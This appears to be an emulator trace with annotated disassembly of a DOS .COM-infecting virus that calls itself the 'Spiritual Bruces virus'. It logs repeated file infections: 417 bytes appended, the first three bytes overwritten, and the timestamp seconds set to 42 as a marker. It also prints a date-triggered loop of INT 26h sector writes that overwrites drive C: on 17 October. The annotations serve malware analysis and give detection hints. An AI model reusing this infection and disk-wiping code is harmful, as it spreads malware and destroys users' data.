2018-12-25T11:46:06.435319347Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.441984688Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.449199617Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.458767963Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.461835947Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.471728094Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.478748385Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.485778619Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.487160869Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.489705466Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.496599484Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.497642762Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.501959917Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.503717709Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.509837635Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.516183908Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.520095694Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.53114882Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.537468283Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.544580369Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.546474078Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.549034216Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.552447468Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.55400155Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.556789258Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.559239505Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.567758532Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.577928687Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.580816231Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.591020076Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.59800435Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.605549251Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.608096974Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.611168135Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.619810189Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.622487679Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.625491226Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.62721852Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.635458687Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.645567769Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.647968627Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.649349473Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":17,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Instructions executed after the INT 21h "Get date" call (syscall 42 = AH=2Ah; DH = month, DL = day).
; Date trigger: on 17 October execution falls into the INT 26h sector-write loop; on any other
; date it jumps to 0x12b60 and carries on with the file-infection path.
; NOTE(review): no further DOS calls are logged in this run, which is consistent with the trigger
; branch being taken (the run configuration printed above this trace sets 17 October) - confirm
; against the emulator's disk-access log.
2018-12-25T11:46:06.192065508Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no -> skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no -> skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number: 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer, bp-relative (presumably inside the sample's own body)
0x12b56: cdq  ; one-byte encoding (next address is +1), so in 16-bit code this acts as CWD: DX = sign of AX, presumably 0 = first sector
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = count, DX = start sector, DS:BX = data; CF set on error
0x12b59: inc dx  ; next sector (INC leaves CF untouched)
0x12b5a: jae 0x12b57  ; CF clear (write succeeded) -> overwrite the next sector
0x12b5c: inc al  ; write failed: bump AL (presumably intended as the next drive)
0x12b5e: jmp 0x12b4f  ; restart the loop; no exit from it is visible in this window
0x12b60: mov di, 0x100  ; ES:DI = 0x100, the entry offset of a .COM program
0x12b63: lea si, word ptr [bp + 0x2a1]  ; DS:SI = three saved bytes, bp-relative
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: presumably restores the host's original first three bytes in memory
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DS:DX = bp-relative buffer handed to the call below
0x12b6d: call 0x12c14  ; helper; its body is outside this window
0x12b70: lea dx, word ptr [bp + 0x298]  ; window ends here; use of this pointer is not visible

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Instructions executed after the INT 21h "Get date" call (syscall 42 = AH=2Ah; DH = month, DL = day).
; Date trigger: on 17 October execution falls into the INT 26h sector-write loop; on any other
; date it jumps to 0x12b60 and carries on with the file-infection path. This run continues with
; file operations, so the trigger was presumably not met.
2018-12-25T11:46:06.44423898Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no -> skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no -> skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number: 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer, bp-relative (presumably inside the sample's own body)
0x12b56: cdq  ; one-byte encoding (next address is +1), so in 16-bit code this acts as CWD: DX = sign of AX, presumably 0 = first sector
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = count, DX = start sector, DS:BX = data; CF set on error
0x12b59: inc dx  ; next sector (INC leaves CF untouched)
0x12b5a: jae 0x12b57  ; CF clear (write succeeded) -> overwrite the next sector
0x12b5c: inc al  ; write failed: bump AL (presumably intended as the next drive)
0x12b5e: jmp 0x12b4f  ; restart the loop; no exit from it is visible in this window
0x12b60: mov di, 0x100  ; ES:DI = 0x100, the entry offset of a .COM program
0x12b63: lea si, word ptr [bp + 0x2a1]  ; DS:SI = three saved bytes, bp-relative
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: presumably restores the host's original first three bytes in memory
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DS:DX = bp-relative buffer handed to the call below
0x12b6d: call 0x12c14  ; helper; the next logged call is "Set disk transfer address" at PC 12c18, so DX is presumably the new DTA
0x12b70: lea dx, word ptr [bp + 0x298]  ; window ends here; presumably the search pattern for the "Find first file" call that follows
2018-12-25T11:46:06.447343781Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:06.448445127Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:06.454493106Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.476637604Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.487830457Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.49452409Z 66 PC: 12bb6 | Move file pointer
; Instructions executed after the INT 21h "Get time" call (syscall 44 = AH=2Ch; DH = seconds, DL = hundredths).
; This is the tail of the per-file infection sequence and lines up with the logged rows that follow:
; a 417-byte write, a seek, a 3-byte write, a timestamp update and a close.
; Detection hints visible here: the host file grows by 417 bytes, its first three bytes are
; replaced, and the seconds field of its timestamp is forced to 42.
2018-12-25T11:46:06.497433088Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; tests ZF as left on return from the call; the target lies 4 bytes before this address, so a taken branch presumably repeats the clock read
0x12bc7: mov word ptr [bp + 0x11e], dx  ; store seconds/hundredths in a bp-relative word; its use is not visible here (possibly a per-infection value - confirm)
0x12bcb: call 0x22b02  ; printed target is 0x12bce + 0xff34 without 16-bit wraparound; the effective target is presumably 0x12b02, whose code issues the 417-byte write logged at PC 12b10
0x12bce: cdq  ; one-byte encoding: acts as CWD in 16-bit code, DX = sign of AX (presumably 0)
0x12bcf: xor cx, cx  ; CX = 0, high word of the seek offset
0x12bd1: mov ax, 0x4200  ; AH=42h AL=00h: move file pointer relative to the start of the file
0x12bd4: int 0x21  ; seek to CX:DX (presumably offset 0)
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; DS:DX = 3-byte buffer, bp-relative
0x12bda: mov cx, 3  ; length = 3 bytes
0x12bdd: mov ah, 0x40  ; AH=40h: write to file handle
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5": overwrites the file's first three bytes (presumably with a jump to the appended code)
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; DX = file date for AX=5701h (presumably the value saved earlier)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; CX = file time
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds field (bits 0-4)
0x12bec: or cl, 0x15  ; seconds field = 21, i.e. 42 s in 2-second units; likely the "already infected" marker
0x12bef: mov ax, 0x5701  ; AH=57h AL=01h: set file date and time
0x12bf2: int 0x21  ; apply the modified timestamp
0x12bf4: mov ah, 0x3e  ; AH=3Eh: close file handle
0x12bf6: int 0x21  ; logged as "Close file"
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; window ends here; the next logged call is "Get or set file attributes" at PC 12c07, so presumably the file name
2018-12-25T11:46:06.499931854Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.50787794Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.509552228Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.515881169Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.517167805Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.52478634Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.534016832Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.536445257Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.546049131Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.552577116Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.559167976Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.560661119Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.563026616Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.565913202Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.568915936Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.574159228Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.576064515Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.584735059Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.595789761Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.599002744Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.609826799Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.617671805Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.625045492Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.626926219Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.62965523Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.632469187Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.633701839Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.636541345Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.637998544Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.645448045Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.655873137Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.658732006Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.66877432Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.676074225Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.682571961Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.684219063Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.688436521Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.697518161Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.699151898Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.701986292Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.703324247Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.710523184Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.720891865Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.7235516Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.733005318Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.740312545Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.746665693Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.748134021Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.751267589Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.754252236Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.755940967Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.75933819Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.76186664Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.769205168Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.779560661Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.782333228Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.792447806Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.799861656Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.805994822Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.807591358Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.810960035Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.81958956Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.821275675Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.829160975Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.831381453Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.839262806Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.849705908Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.852609093Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.862485704Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.870462423Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.877022308Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.878439539Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.880979659Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.884162696Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.885557228Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.888517851Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.893080686Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.900764887Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.91060213Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.914354111Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.923914736Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.930574807Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.933662695Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.935357066Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.937491062Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.945808604Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.947091355Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.949209584Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.951145301Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.95844776Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.968885332Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.971621908Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.972636388Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')